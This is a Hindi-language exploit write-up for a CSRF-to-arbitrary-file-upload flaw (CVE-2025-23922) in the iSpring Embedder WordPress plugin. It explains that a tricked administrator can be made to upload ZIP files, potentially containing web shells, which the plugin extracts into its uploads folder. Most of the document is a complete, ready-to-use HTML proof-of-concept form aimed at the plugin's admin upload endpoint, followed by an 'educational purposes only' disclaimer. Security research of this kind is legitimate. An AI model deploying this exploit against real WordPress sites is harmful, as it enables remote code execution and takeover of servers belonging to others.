
WordPress iSpring Embedder प्लगइन <= 1.0 - CSRF से मनमाना फ़ाइल अपलोड भेद्यता
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:HiSpring Embedder WordPress प्लगइन में एक CSRF भेद्यता एक अप्रमाणित दूरस्थ हमलावर को प्रमाणित व्यवस्थापक को धोखा देकर सर्वर पर मनमानी फ़ाइलें (जैसे PHP वेब शेल) अपलोड करने की अनुमति देती है।
कमजोर एंडपॉइंट किसी भी CSRF सुरक्षा को लागू नहीं करता है, और फ़ाइल अपलोड सुविधा .zip फ़ाइलों को स्वीकार करती है, जिन्हें निम्न स्थान पर निकाला जाता है:
/wp-content/uploads/iSpring_embedder/
एक हमलावर निम्न कार्य कर सकता है:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>CSRF File Upload Exploit</title>
<style>
body {
font-family: Arial, sans-serif;
background-color: #f4f4f4;
padding: 20px;
}
.container {
background: #fff;
padding: 25px;
border-radius: 10px;
box-shadow: 0 0 10px rgba(0,0,0,0.1);
max-width: 600px;
margin: auto;
}
h1 {
color: #d9534f;
}
input[type="file"],
input[type="submit"] {
margin-top: 10px;
padding: 10px;
font-size: 16px;
}
.footer {
margin-top: 30px;
font-size: 14px;
color: #777;
text-align: center;
}
</style>
</head>
<body>
<div class="container">
<h1>CSRF Exploit – File Upload</h1>
<p>
This is a proof-of-concept (PoC) exploit for the following vulnerability:
</p>
<ul>
<li><strong>Vulnerability:</strong> CSRF leading to Arbitrary File Upload</li>
<li><strong>Plugin:</strong> iSpring Embedder for WordPress (<= v1.0)</li>
<li><strong>CVE:</strong> CVE-2025-23922</li>
<li><strong>Impact:</strong> Remote attackers can coerce an authenticated administrator to upload arbitrary files, potentially including web shells.</li>
<li><strong>Upload Path:</strong> <code>/wp-content/uploads/iSpring_embedder/</code></li>
</ul>
<form id="csrfForm" action="http://wordpresssite/wp-admin/admin.php?page=ispring-embedder" method="POST" enctype="multipart/form-data">
<label><strong>Select ZIP file to upload:</strong></label><br>
<input type="file" name="zip_file" required><br>
<input type="hidden" name="file_name" value="exploit_csrf">
<input type="submit" name="submit_ispring_form" value="Upload File via CSRF">
</form>
<div class="footer">
<p>
Exploit for <strong>CSRF to Arbitrary File Upload vulnerability</strong><br>
<strong>CVE-2025-23922</strong><br>
Developed by <strong>Nxploit | Khaled Alenazi</strong>
</p>
</div>
</div>
</body>
</html>
यह प्रूफ-ऑफ-कॉन्सेप्ट केवल शैक्षिक और शोध उद्देश्यों के लिए प्रदान किया गया है।
लेखक इस एक्सप्लॉइट के किसी भी दुरुपयोग या क्षति के लिए ज़िम्मेदार नहीं है।
Nxploit | Khaled Alenazi
सुरक्षा शोधकर्ता और एक्सप्लॉइट डेवलपर
https://github.com/Nxploit